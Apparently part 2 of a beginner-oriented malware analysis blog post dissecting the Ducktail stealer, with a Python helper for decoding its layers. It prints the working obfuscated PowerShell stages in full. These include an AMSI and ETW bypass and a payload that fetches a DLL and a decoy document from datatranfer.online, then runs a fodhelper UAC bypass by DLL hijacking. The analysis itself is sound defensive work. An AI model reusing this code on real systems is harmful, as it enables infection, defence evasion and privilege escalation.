How to dissect your Remote Access Trojan, for beginners: Ducktail Stealer, Part 2.

Cristóbal Martínez
11 min read · Jun 19, 2024


We continue from part 1.

Well, the result of the previous code is yet another PowerShell script. Here is the full code:

$mfxtfsh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Rjb3VudCAtZ3QgMCkNCiAgICB7DQogICAgICAgIHRyeXsNCiAgICAgICAgICAgIEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgJFVybCAtT3V0RmlsZSAkRGVzdGluYXRpb247DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICJEb3dubG9hZCBzdWNjZXNzICRVcmwiOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICAgICAgY2F0Y2gNCiAgICAgICAgew0KICAgICAgICAgICAgV3JpdGUtSG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTsNCiAgICAgICAgICAgIFdyaXRlLUhvc3QgIkVycm9yIGRvd25sb2FkIGZpbGUgJFVybCINCiAgICAgICAgICAgICRjb3VudCAtPSAxOw0KDQogICAgICAgICAgICBTdGFydC1TbGVlcCAtcyAxNTsNCiAgICAgICAgfQ0KICAgIH0NCn0NCldyaXRlLUhvc3QgIkNoZWNrIG11dGV4dCI7DQokbXR4X2NoaWxkID0gTmV3LU9iamVjdCBTeXN0ZW0uVGhyZWFkaW5nLk11dGV4KCRmYWxzZSwgIlNUQVJUVUFDIik7DQokbXR4ID0gTmV3LU9iamVjdCBTeXN0ZW0uVGhyZWFkaW5nLk11dGV4KCRmYWxzZSwgIlJVTk5JTkciKTsNCiRsb2NrQWNxdWlyZWQgPSAkbXR4LldhaXRPbmUoMCk7DQokbG9ja0FjcXVpcmVkQ2hpbGQgPSAkbXR4X2NoaWxkLldhaXRPbmUoMCk7DQppZiAoJGxvY2tBY3F1aXJlZCAtZXEgJHRydWUgLWFuZCAkbG9ja0FjcXVpcmVkQ2hpbGQgLWVxICR0cnVlKSANCnsNCiAgICAkbXR4LlJlbGVhc2VNdXRleCgpOw0KICAgIFdyaXRlLUhvc3QgIk11dGV4IGlzIG5vdCBsb2NrZWQiOw0KICAgICRpc1VBQ09wZW4gPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxcU09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFBvbGljaWVzXFxTeXN0ZW0pLkVuYWJsZUxVQTsNCiAgICAgDQogICAgaWYoJGlzVUFDT3BlbiAtZXEgMSkNCiAgICB7DQogICAgICAgICRpc1VBQ09wZW4gPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLkNvbnNlbnRQcm9tcHRCZWhhdmlvckFkbWluOw0KICAgIH0NCiAgICBXcml0ZS1Ib3N0ICRpc1VBQ09wZW47DQoNCiAgICBpZigkaXNVQUNPcGVuIC1lcSAwKQ0KICAgIHsNCiAgICAgICAgV3JpdGUtSG9zdCAia28gY2FuIGJ5cGFzcyB1YWMiOw0KICAgICAgICBTdGFydC1Qcm9jZXNzICJjbWQuZXhlIiAtV2luZG93U3R5bGUgaGlkZGVuIC1WZXJiIHJ1bmFzIC1Bcmd1bWVudExpc3QgKCIvYyBzdGFydCAvbWluICIiIHBvd2Vyc2hlbGwuZXhlIC1XaW5kb3dTdHlsZSBoaWRkZW4gIC1Ob0xvZ28gLU5vUHJvZmlsZSAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtRW5jb2RlZENvbW1hbmQgSkFCaEFIa0Fkd0JqQUhnQWRBQm9BR2tBWWdCa0FEMEFXd0JUQUhrQWN3QjBBR1VBYlFBdUFGUUFaUUI0QUhRQUxnQkZBRzRBWXdCdkFHUUFhUUJ1QUdjQ
VhRQTZBRG9BUVFCVEFFTUFTUUJKQUM0QVJ3QmxBSFFBVXdCMEFISUFhUUJ1QUdjQUtBQmJBRk1BZVFCekFIUUFaUUJ0QUM0QVF3QnZBRzRBZGdCbEFISUFkQUJkQURvQU9nQkdBSElBYndCdEFFSUFZUUJ6QUdVQU5nQTBBRk1BZEFCeUFHa0FiZ0JuQUNnQUlnQmtBRWNBUlFCMkFHTUFTQUJOQUhZQVR3QkhBRTBBZUFCYUFFUUFSZ0JvQUUwQVZBQlZBSGtBVFFCdEFGVUFkd0JOQUhvQVl3QjNBRTRBVndCT0FHc0FUUUJIQUVvQWFBQk9BRzBBVmdCc0FFMEFhZ0JDQUcwQVRnQkVBR1FBYkFCTkFESUFUUUE5QUNJQUtRQXBBRHNBQ2dBa0FIUUFkQUJtQUc4QVlnQTlBRnNBVXdCNUFITUFkQUJsQUcwQUxnQlVBR1VBZUFCMEFDNEFSUUJ1QUdNQWJ3QmtBR2tBYmdCbkFGMEFPZ0E2QUVFQVV3QkRBRWtBU1FBdUFFY0FaUUIwQUZNQWRBQnlBR2tBYmdCbkFDZ0FXd0JUQUhrQWN3QjBBR1VBYlFBdUFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDSUFZUUJJQUZJQU1BQmpBRVFBYndCMkFFd0FNZ0JTQUdnQVpBQkhBRVlBTUFCakFHMEFSZ0IxQUZvQWJRQldBSGtBVEFCdEFEa0FkUUJpQUVjQWJBQjFBRm9BVXdBNUFHZ0FZd0JIQUdzQWRnQmFBRzBBYkFCekFGb0FWd0JTQUdnQUlnQXBBQ2tBT3dBS0FDUUFkUUJ5QUdrQUlBQTlBQ0FBS0FBa0FIUUFkQUJtQUc4QVlnQWdBQ3NBSUFBa0FHRUFlUUIzQUdNQWVBQjBBR2dBYVFCaUFHUUFLUUE3QUFvQUpBQmpBRzhBZFFCdUFIUUFJQUE5QUNBQU1RQXdBRHNBQ2dCM0FHZ0FhUUJzQUdVQUtBQWtBR01BYndCMUFHNEFkQUFnQUMwQVp3QjBBQ0FBTUFBcEFBb0Fld0FLQUFrQUNnQUpBSFFBY2dCNUFIc0FDZ0FKQUFrQUpBQmpBRzhBYmdCMEFHVUFiZ0IwQUNBQVBRQWdBRWtBYmdCMkFHOEFhd0JsQUMwQVZ3QmxBR0lBVWdCbEFIRUFkUUJsQUhNQWRBQWdBQzBBVlFCeUFHa0FJQUFrQUhVQWNnQnBBQ0FBTFFCVkFITUFaUUJDQUdFQWN3QnBBR01BVUFCaEFISUFjd0JwQUc0QVp3QTdBQW9BQ1FBSkFFa0FiZ0IyQUc4QWF3QmxBQzBBUlFCNEFIQUFjZ0JsQUhNQWN3QnBBRzhBYmdBZ0FDUUFZd0J2QUc0QWRBQmxBRzRBZEFBdUFHTUFid0J1QUhRQVpRQnVBSFFBT3dBS0FBa0FDUUJpQUhJQVpRQmhBR3NBT3dBS0FBa0FmUUFLQUFrQVl3QmhBSFFBWXdCb0FBb0FDUUI3QUFvQUNRQUpBRmNBY2dCcEFIUUFaUUF0QUVnQWJ3QnpBSFFBSUFBa0FGOEFMZ0JGQUhnQVl3QmxBSEFBZEFCcEFHOEFiZ0F1QUUwQVpRQnpBSE1BWVFCbkFHVUFDZ0FKQUFrQUpBQmpBRzhBZFFCdUFIUUFJQUF0QUQwQUlBQXhBRHNBQ2dBSkFBa0FVd0IwQUdFQWNnQjBBQzBBVXdCc0FHVUFaUUJ3QUNBQUxRQnpBQ0FBTVFBMUFEc0FDZ0FKQUgwQUNnQjlBQW9BIik7DQoJCWV4aXQ7DQogICAgfQ0KICAgIGVsc2UNCiAgICB7DQogICAgICAgIFdyaXRlLUhvc3QgImJ5cGFzcyB1YWMgcnVuIGNtZCI7DQogICAgICAgIFN0YXJ0LXByb2Nlc3MgInBvd2Vyc2hlbGwuZXhlIiAgLUFyZ
3VtZW50TGlzdCAoIi1FbmNvZGVkQ29tbWFuZCBVd0IwQUdFQWNnQjBBQzBBVUFCeUFHOEFZd0JsQUhNQWN3QWdBQ0lBWXdCdEFHUUFMZ0JsQUhnQVpRQWlBQ0FBTFFCQkFISUFad0IxQUcwQVpRQnVBSFFBVEFCcEFITUFkQUFnQUNnQUlnQXZBR01BSUFCdEFHc0FaQUJwQUhJQUlBQWlBQ0lBUXdBNkFGd0FWd0JwQUc0QVpBQnZBSGNBY3dBZ0FGd0FJZ0FpQUNBQUpnQWdBRzBBYXdCa0FHa0FjZ0FnQUNJQUlnQkRBRG9BWEFCWEFHa0FiZ0JrQUc4QWR3QnpBQ0FBWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFBaUFDSUFJQUFtQUNBQVl3QnZBSEFBZVFBZ0FDSUFJZ0JEQURvQVhBQlhBR2tBYmdCa0FHOEFkd0J6QUZ3QVV3QjVBSE1BZEFCbEFHMEFNd0F5QUZ3QVpnQnZBR1FBYUFCbEFHd0FjQUJsQUhJQUxnQmxBSGdBWlFBaUFDSUFJQUFpQUNJQVF3QTZBRndBVndCcEFHNEFaQUJ2QUhjQWN3QWdBRndBVXdCNUFITUFkQUJsQUcwQU13QXlBRndBSWdBaUFDSUFLUUFnQUMwQVZ3QnBBRzRBWkFCdkFIY0FVd0IwQUhrQWJBQmxBQ0FBU0FCcEFHUUFaQUJsQUc0QUlBQWdBQzBBVndCaEFHa0FkQUE3QUE9PSIpIC1XaW5kb3dTdHlsZSBIaWRkZW4gIC1XYWl0Ow0KICAgICAgICANCiAgICAgICAgd2hpbGUoJHRydWUpew0KICAgICAgICAgICAgV3JpdGUtSG9zdCAiZG93bmxvYWQgZmlsZSI7DQogICAgICAgICAgICBEb3dubG9hZC1GaWxlRnJvbVVybCAtVXJsICJodHRwOi8vZGF0YXRyYW5mZXIub25saW5lL2FwaS9maWxlZGF0YS9kbGwvNzMzOWVhOWI4YzljMmI3Y2NkMmI3Zjc5Nzc0NTZiNDEiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJvcHN5cy5kbGwiOw0KICAgICAgICAgICAgV3JpdGUtSG9zdCAiU3RhcnQgVGVtcCI7DQogICAgICAgICAgICAkY29tbWFuZCA9ICIvYyAiIkM6XFdpbmRvd3MgXFN5c3RlbTMyXGZvZGhlbHBlci5leGUiIiI7DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICRjb21tYW5kOw0KICAgICAgICAgICAgJGNtZE5hbWUgPSAiY21kLmV4ZSI7DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICAkY21kTmFtZTsNCiAgICAgICAgICAgICRtdHhfcmFuZG9tTXV0ZXg9IE5ldy1PYmplY3QgU3lzdGVtLlRocmVhZGluZy5NdXRleCgkZmFsc2UsICJNeVJhbmRvbU11dGV4Iik7DQogICAgICAgICAgICAkbXR4X3JhbmRvbU11dGV4LldhaXRPbmUoMCk7DQogICAgICAgICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxOw0KICAgICAgICAgICAgd3JpdGUtaG9zdCAic3RhcnQgcHJvY2Vzcywgd2FpdCBzdG9wIjsNCiAgICAgICAgICAgIFN0YXJ0LVByb2Nlc3MgJGNtZE5hbWUgLUFyZ3VtZW50TGlzdCAoJGNvbW1hbmQpIC1XaW5kb3dTdHlsZSBIaWRkZW47DQogICAgICAgICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAyOw0KDQogICAgICAgICAgICB0cnl7DQogICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRsb2NrQWNxdWlyZWQgPSAkbXR4LldhaXRPbmUoMCk7DQogICAgICAgICAgICAgICAgV3JpdGUtSG9zd
CAiTG9jayBzdGF0dXMgJCgkbG9ja0FjcXVpcmVkKSI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaHsNCiAgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiQW4gZXJyb3Igb2NjdXJyZWQ6ICQoJF8uRXhjZXB0aW9uLk1lc3NhZ2UpIjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgDQogICAgICAgICAgICAkY291bnRXYWl0ID0gMTA7DQogICAgICAgICAgICB3aGlsZSgkY291bnRXYWl0IC1ndCAwIC1hbmQgICRsb2NrQWNxdWlyZWQgLWVxICR0cnVlKXsNCiAgICAgICAgICAgICAgICB0cnl7DQogICAgICAgICAgICAgICAgICAgIFN0YXJ0LVNsZWVwIC1TZWNvbmRzIDE7DQogICAgICAgICAgICAgICAgICAgICRtdHguUmVsZWFzZU11dGV4KCk7DQogICAgICAgICAgICAgICAgICAgIFN0YXJ0LVNsZWVwIC1TZWNvbmRzIDE7DQogICAgICAgICAgICAgICAgICAgICRjb3VudFdhaXQtLTsNCiAgICAgICAgICAgICAgICAgICAgJGxvY2tBY3F1aXJlZCA9ICRtdHguV2FpdE9uZSgwKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgY2F0Y2h7DQogICAgICAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJBbiBlcnJvciBvY2N1cnJlZCAyOiAkKCRfLkV4Y2VwdGlvbi5NZXNzYWdlKSI7DQogICAgICAgICAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICANCg0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJG10eF9yYW5kb21NdXRleC5SZWxlYXNlTXV0ZXgoKTsNCiAgICAgICAgICAgIGlmKCRjb3VudFdhaXQgLWd0IDApew0KICAgICAgICAgICAgICAgIHdyaXRlLWhvc3QgIk9LIjsNCiAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgICAgIH0NCg0KDQogICAgICAgICAgICBXcml0ZS1Ib3N0ICJUcnkgYWdhaW4iOw0KICAgICAgICB9DQogICAgICAgDQogICAgfQ0KDQoNCiAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxMDsNCg0KDQp9IA0KdHJ5ew0KICAgICRtdHguUmVsZWFzZU11dGV4KCk7DQp9Y2F0Y2h7DQogICAgI2JvIHF1YQ0KfQ0KdHJ5ew0KICAgICRtdHhfY2hpbGQuUmVsZWFzZU11dGV4KCk7IA0KfWNhdGNoew0KICAgICNibyBxdWENCn0NCg0KV3JpdGUtaG9zdCAiT0siOw0KDQoNCg0KV2FpdC1Kb2IgJGpvYg0KUmVtb3ZlLUpvYiAkam9iDQo="));
$utsizbwrfw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("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"));
$hyncamws=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGljLFN0YXRpYw=="));
$bovlwqvgbv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$bdvmg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHdQcm92aWRlcg=="));
$tjjjhwk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZQ=="));
$hmndchg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVy"));
$iceclpuhk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3k="));
$rxnhtw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsSW5zdGFuY2U="));
$zceyyso=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$ibzfakiwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9lbmFibGVk"));
$xrbgfk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$dwsmar=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVy"));
$fheudqhgrx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));
$qposrf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uQ29yZQ=="));
$bzehatvak=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$qauuxyvoyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsU3RhdGlj"));
$kyflk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$dgufplyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c2lJbml0RmFpbGVk"));
$aylsisopw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW0="));
$lgqhad=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));
$hxqcf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
$luqyrk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WjNoM1lta2dQU0FrZEhKMVpRPT0="));
$mrzdr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkhCd1kzTm0="));
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($mrzdr + $luqyrk))));
$scklyswgmmajfkay = [Ref].Assembly.GetType(($hxqcf + $lgqhad)).GetField(($aylsisopw + $dgufplyl),($kyflk + $qauuxyvoyl));
$scklyswgmmajfkay.SetValue($null,$ppcsfgxwbi);
[Reflection.Assembly]::LoadWithPartialName(($bzehatvak + $qposrf)).GetType(($fheudqhgrx + $dwsmar)).GetField(($xrbgfk + $ibzfakiwj),($zceyyso + $rxnhtw)).SetValue([Ref].Assembly.GetType(($iceclpuhk + $hmndchg)).GetField(($tjjjhwk + $bdvmg),($kyflk + $qauuxyvoyl)).GetValue($null),0);
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($utsizbwrfw + $mfxtfsh))));

This last stage is somewhat larger, but if we look closely the IOA is the same: strings cut into base64 fragments kept in throw-away variables, plus two parts for the payload that must be joined. Decoding the short fragments is enough to see what the stub in between does: it evaluates "$ppcsfgxwbi = $true", writes that value into the amsiInitFailed field of System.Management.Automation.AmsiUtils (the classic AMSI bypass), and then sets m_enabled to 0 on the etwProvider of System.Management.Automation.Tracing.PSEtwLogProvider (silencing PowerShell's ETW logging). Again I will get to the point: $utsizbwrfw + $mfxtfsh is where the (hopefully final) payload lives:
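The following Python helper is an added example written for this post, not the author's tooling and not part of the sample. It parses the fragment assignments above (copied from the stub, with the two large payload fragments omitted), resolves every ($a + $b) concatenation, and decodes the second base64 layer where the joined string is itself fed to FromBase64String, so the AMSI and ETW type and field names and the "$ppcsfgxwbi = $true" assignment fall out without hand work:

```python
import base64
import re

# Added example, written for this post (not the author's tooling and not part of
# the sample): resolve the obfuscation pattern used by the stub above, where every
# string is cut into base64 fragments held in throw-away variables and glued back
# together at the point of use. SAMPLE reproduces the short fragment assignments
# and the stub from the page; the two large payload fragments ($utsizbwrfw and
# $mfxtfsh) are left out on purpose, so that Invoke-Expression is reported as
# unresolved instead of decoded.
SAMPLE = r'''
$hyncamws=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGljLFN0YXRpYw=="));
$bovlwqvgbv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$bdvmg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHdQcm92aWRlcg=="));
$tjjjhwk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZQ=="));
$hmndchg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVy"));
$iceclpuhk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3k="));
$rxnhtw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsSW5zdGFuY2U="));
$zceyyso=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$ibzfakiwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9lbmFibGVk"));
$xrbgfk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$dwsmar=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVy"));
$fheudqhgrx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));
$qposrf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uQ29yZQ=="));
$bzehatvak=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$qauuxyvoyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsU3RhdGlj"));
$kyflk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$dgufplyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c2lJbml0RmFpbGVk"));
$aylsisopw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW0="));
$lgqhad=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));
$hxqcf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
$luqyrk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WjNoM1lta2dQU0FrZEhKMVpRPT0="));
$mrzdr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkhCd1kzTm0="));
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($mrzdr + $luqyrk))));
$scklyswgmmajfkay = [Ref].Assembly.GetType(($hxqcf + $lgqhad)).GetField(($aylsisopw + $dgufplyl),($kyflk + $qauuxyvoyl));
$scklyswgmmajfkay.SetValue($null,$ppcsfgxwbi);
[Reflection.Assembly]::LoadWithPartialName(($bzehatvak + $qposrf)).GetType(($fheudqhgrx + $dwsmar)).GetField(($xrbgfk + $ibzfakiwj),($zceyyso + $rxnhtw)).SetValue([Ref].Assembly.GetType(($iceclpuhk + $hmndchg)).GetField(($tjjjhwk + $bdvmg),($kyflk + $qauuxyvoyl)).GetValue($null),0);
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($utsizbwrfw + $mfxtfsh))));
'''

# $name=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("..."))
ASSIGN_RE = re.compile(
    r'\$(?P<name>\w+)\s*=\s*\[System\.Text\.Encoding\]::ASCII\.GetString\('
    r'\[System\.Convert\]::FromBase64String\("(?P<b64>[A-Za-z0-9+/=]*)"\)\)'
)
# ($a + $b): a string rebuilt from two fragments at the point of use
CONCAT_RE = re.compile(r'\(\s*\$(?P<a>\w+)\s*\+\s*\$(?P<b>\w+)\s*\)')
# FromBase64String(($a + $b)): the rebuilt string is itself base64 (a second layer)
INNER_RE = re.compile(r'FromBase64String\(\(\s*\$(?P<a>\w+)\s*\+\s*\$(?P<b>\w+)\s*\)\)')


def collect_fragments(script):
    """Map every $variable to the ASCII text its base64 literal decodes to."""
    return {m['name']: base64.b64decode(m['b64']).decode('ascii')
            for m in ASSIGN_RE.finditer(script)}


def resolve_concats(script, frags):
    """Join each ($a + $b) pair whose fragments are known; keys read '$a + $b'."""
    joined = {}
    for m in CONCAT_RE.finditer(script):
        a, b = m['a'], m['b']
        if a in frags and b in frags:
            joined[f'${a} + ${b}'] = frags[a] + frags[b]
    return joined


def decode_inner_layers(script, frags):
    """Decode the second base64 layer for pairs passed to FromBase64String.
    Pairs whose fragments are not in the script (the big payload) map to None."""
    inner = {}
    for m in INNER_RE.finditer(script):
        a, b = m['a'], m['b']
        key = f'${a} + ${b}'
        if a in frags and b in frags:
            inner[key] = base64.b64decode(frags[a] + frags[b]).decode('ascii', 'replace')
        else:
            inner[key] = None
    return inner


def deobfuscate(script):
    """One pass over a stub of this shape: fragments, rebuilt strings, inner layers."""
    frags = collect_fragments(script)
    return {
        'fragments': frags,
        'strings': resolve_concats(script, frags),
        'inner': decode_inner_layers(script, frags),
    }


if __name__ == '__main__':
    result = deobfuscate(SAMPLE)
    for key, value in result['strings'].items():
        print(f'{key:26} -> {value}')
    for key, value in result['inner'].items():
        print(f'{key:26} => {value if value is not None else "<fragments not in sample>"}')
```

Running it prints the rebuilt strings (System.Management.Automation.AmsiUtils, amsiInitFailed, NonPublic,Static, System.Diagnostics.Eventing.EventProvider, m_enabled, and so on) and the inner layer "$ppcsfgxwbi = $true"; the payload pair is listed as unresolved because its fragments were left out of SAMPLE. Feed it the complete stage and the same code yields the payload text.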

#
# openFile.ps1
#
# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "http://datatranfer.online/file/docs/$fileName";
# Create a script block for the job
$scriptBlock = {
param (
[string]$filePath,
[string]$fileUrl
)
# Check if the file exists
if (-not (Test-Path -Path $filePath)) {
Write-Host "File does not exist. Downloading..."

# Download the file from the URL
Invoke-WebRequest -Uri $fileUrl -OutFile $filePath

Write-Host "Download complete."
}
# Open the file with the default program
Start-Process -FilePath $filePath
}
# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl
# Check if the job is running
if ($job.State -eq 'Running') {
Write-Host "Job is running. Job ID: $($job.Id)"
} else {
Write-Host "Job failed to start."
}
function Download-FileFromUrl {
param (
[string]$Url,
[string]$Destination
)
$count = 10;
while($count -gt 0)
{
try{
Invoke-WebRequest -URI $Url -OutFile $Destination;
Write-Host "Download success $Url";
break;
}
catch
{
Write-Host $_.Exception.Message;
Write-Host "Error download file $Url"
$count -= 1;
Start-Sleep -s 15;
}
}
}
Write-Host "Check mutext";
$mtx_child = New-Object System.Threading.Mutex($false, "STARTUAC");
$mtx = New-Object System.Threading.Mutex($false, "RUNNING");
$lockAcquired = $mtx.WaitOne(0);
$lockAcquiredChild = $mtx_child.WaitOne(0);
if ($lockAcquired -eq $true -and $lockAcquiredChild -eq $true)
{
$mtx.ReleaseMutex();
Write-Host "Mutex is not locked";
$isUACOpen = (Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).EnableLUA;

if($isUACOpen -eq 1)
{
$isUACOpen = (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin;
}
Write-Host $isUACOpen;
if($isUACOpen -eq 0)
{
Write-Host "ko can bypass uac";
Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 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");
exit;
}
else
{
Write-Host "bypass uac run cmd";
Start-process "powershell.exe" -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden -Wait;

while($true){
Write-Host "download file";
Download-FileFromUrl -Url "http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41" -Destination "C:\Windows \System32\propsys.dll";
Write-Host "Start Temp";
$command = "/c ""C:\Windows \System32\fodhelper.exe""";
Write-Host $command;
$cmdName = "cmd.exe";
Write-Host $cmdName;
$mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
$mtx_randomMutex.WaitOne(0);
Start-Sleep -Seconds 1;
write-host "start process, wait stop";
Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
Start-Sleep -Seconds 2;
try{

$lockAcquired = $mtx.WaitOne(0);
Write-Host "Lock status $($lockAcquired)";
}
catch{
Write-Host "An error occurred: $($_.Exception.Message)";
}

$countWait = 10;
while($countWait -gt 0 -and $lockAcquired -eq $true){
try{
Start-Sleep -Seconds 1;
$mtx.ReleaseMutex();
Start-Sleep -Seconds 1;
$countWait--;
$lockAcquired = $mtx.WaitOne(0);
}
catch{
Write-Host "An error occurred 2: $($_.Exception.Message)";
break;
}
}
$mtx_randomMutex.ReleaseMutex();
if($countWait -gt 0){
write-host "OK";
break;
}
Write-Host "Try again";
}

}
Start-Sleep -Seconds 10;
}
try{
$mtx.ReleaseMutex();
}catch{
#bo qua
}
try{
$mtx_child.ReleaseMutex();
}catch{
#bo qua
}
Write-host "OK";
Wait-Job $job
